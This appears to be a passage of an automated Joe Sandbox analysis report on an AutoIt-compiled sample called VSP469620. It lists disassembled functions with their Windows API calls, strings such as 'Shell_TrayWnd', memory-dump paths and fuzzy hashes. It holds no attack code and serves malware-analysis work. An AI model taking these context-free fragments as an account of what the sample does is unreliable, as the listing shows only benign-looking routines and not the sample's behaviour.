                                                              Function 00AB6430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AB3DEE,00B71148,?,?,?,?,?,00AB3AA3,?), ref: 00AB6471
                                                              • _wcscat.LIBCMT ref: 00B25DDB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FullNamePath_wcscat
                                                              • String ID: 0
                                                              • API String ID: 2109976907-3684773922
                                                              • Opcode ID: df4daac6c1e88cfe58474dd945ce801f50225d93c837edb26f24ddd5fa5826ee
                                                              • Instruction ID: ade61f845fe5b273f2ae518f0eefdadeca206bcce30129937b365a32ec7bb914
                                                              • Opcode Fuzzy Hash: df4daac6c1e88cfe58474dd945ce801f50225d93c837edb26f24ddd5fa5826ee
                                                              • Instruction Fuzzy Hash: 3F116132A04519AA8B40FBACCA42ECD77FCAF08344F1041A5B54DD7243EE7497889B61
                                                              Function 00AEB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00AEB7EF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 1246c8c72eb171d64cd207b9ecbf55f4889dbcb0fcab4f8108069d8a498aed4d
                                                              • Instruction ID: ede18d509a56a5b9b375c59523a5fef0fd1abe4cd1c227be8a00448330b03dcc
                                                              • Opcode Fuzzy Hash: 1246c8c72eb171d64cd207b9ecbf55f4889dbcb0fcab4f8108069d8a498aed4d
                                                              • Instruction Fuzzy Hash: 5B012F71611158ABDB04EBA4CD52EFE33BDBF46360B00061CF472A32D2EB749C088BA0
                                                              Function 00AEB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00AEB6EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 8c35a1633987541287b898ae0ab04ca5bd9a94d1726e762300a5d601dc87e66b
                                                              • Instruction ID: a317c8fc7329692225ec8499896fc36cacaf55b15fb1cf7a104f08b879baab21
                                                              • Opcode Fuzzy Hash: 8c35a1633987541287b898ae0ab04ca5bd9a94d1726e762300a5d601dc87e66b
                                                              • Instruction Fuzzy Hash: 9301A275641044ABDB04EBA5CA57FFF73BC9F05344F100029B402B31D2DBA49E189BB5
                                                              Function 00AEB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00AEB76C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 3850602802-1403004172
                                                              • Opcode ID: 95afcf4af0d80a1815f69fdebbe9f437625f275e3109e520e62fecac9ff48223
                                                              • Instruction ID: 1a1195a54e244e7e7f67e7991073f4accb81dff357fbe534ecb4aa7d143efbb6
                                                              • Opcode Fuzzy Hash: 95afcf4af0d80a1815f69fdebbe9f437625f275e3109e520e62fecac9ff48223
                                                              • Instruction Fuzzy Hash: 0F01D175A41144ABDB00EBA4CA03FFF73BC9B05340F100029B402B31E2DB649E199BB5
                                                              Function 00AF7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ClassName_wcscmp
                                                              • String ID: #32770
                                                              • API String ID: 2292705959-463685578
                                                              • Opcode ID: 8aa6ad3bf20bb59dee8c74f33b85c36d8145076fe189320d6c1220dd336a90f4
                                                              • Instruction ID: 083f922ca4ed3fd18b3adf0a0da5ae4dfe3822e55bc357cb1ffcd99c6e4b336a
                                                              • Opcode Fuzzy Hash: 8aa6ad3bf20bb59dee8c74f33b85c36d8145076fe189320d6c1220dd336a90f4
                                                              • Instruction Fuzzy Hash: 90E02237A0422827D720AAA5EC0AE8BFBACAB51B60F000016F905D3041DA70A60087E0
                                                              Function 00AEA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00AEA63F
                                                                • Part of subcall function 00AD13F1: _doexit.LIBCMT ref: 00AD13FB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Message_doexit
                                                              • String ID: AutoIt$Error allocating memory.
                                                              • API String ID: 1993061046-4017498283
                                                              • Opcode ID: 4bba09daa8c100d6dff955c78c512a395187489f497f19d8aba98f5bb4ceb17d
                                                              • Instruction ID: 46df4561041f8bba4fef802bad4d902082ccb469a51faae6c934c1c255d74890
                                                              • Opcode Fuzzy Hash: 4bba09daa8c100d6dff955c78c512a395187489f497f19d8aba98f5bb4ceb17d
                                                              • Instruction Fuzzy Hash: 9FD05B313C4B1837D21437A97D17FC9758C8B55B95F14006AFB0CD95D24DE6965041D9
                                                              Function 00B2AE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?), ref: 00B2ACC0
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00B2AEBD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: DirectoryFreeLibrarySystem
                                                              • String ID: WIN_XPe
                                                              • API String ID: 510247158-3257408948
                                                              • Opcode ID: b148c8423838afbe9da8dbbf6527faab24c8e05a42d5c04a6707508a0abc800f
                                                              • Instruction ID: 5e76f038ca9723eb6e50a023490d3f5b3dab0b61ceda210e49b55c25ac0f8318
                                                              • Opcode Fuzzy Hash: b148c8423838afbe9da8dbbf6527faab24c8e05a42d5c04a6707508a0abc800f
                                                              • Instruction Fuzzy Hash: B2E0ED70C00619DFCB11DBA9ED84AECB7F9EB48301F1481D5E11AB2560DB705A84DF22
                                                              Function 00B18698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B186A2
                                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B186B5
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: 4baa4b9013a75530ccbe36369d2b27ae0d65d7897743f1a3a67a18349e58d6bf
                                                              • Instruction ID: 5c506d6ca901eb8b0c038ae3d4056f8bbb82b075714a74cbc4e2a706c72ca1a3
                                                              • Opcode Fuzzy Hash: 4baa4b9013a75530ccbe36369d2b27ae0d65d7897743f1a3a67a18349e58d6bf
                                                              • Instruction Fuzzy Hash: E9D01275784318B7E2647770AC0BFDE7E58AB14B11F210855F74AAB1D0CDE4E950C754
                                                              Function 00B186CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B186E2
                                                              • PostMessageW.USER32(00000000), ref: 00B186E9
                                                                • Part of subcall function 00AF7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AF7AD0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: FindMessagePostSleepWindow
                                                              • String ID: Shell_TrayWnd
                                                              • API String ID: 529655941-2988720461
                                                              • Opcode ID: a2681251ced879962d66b4dbcf5698d0933e0a5af42fe84c66689ce0a90949e2
                                                              • Instruction ID: df255b2a5ff3240677f1440274d14c56130fbdca4d585a35df47c9728edc6529
                                                              • Opcode Fuzzy Hash: a2681251ced879962d66b4dbcf5698d0933e0a5af42fe84c66689ce0a90949e2
                                                              • Instruction Fuzzy Hash: 98D0C9717853186BE2646770AC0BFCA6A58AB14B11F610855B746AB1D0C9A4A9508754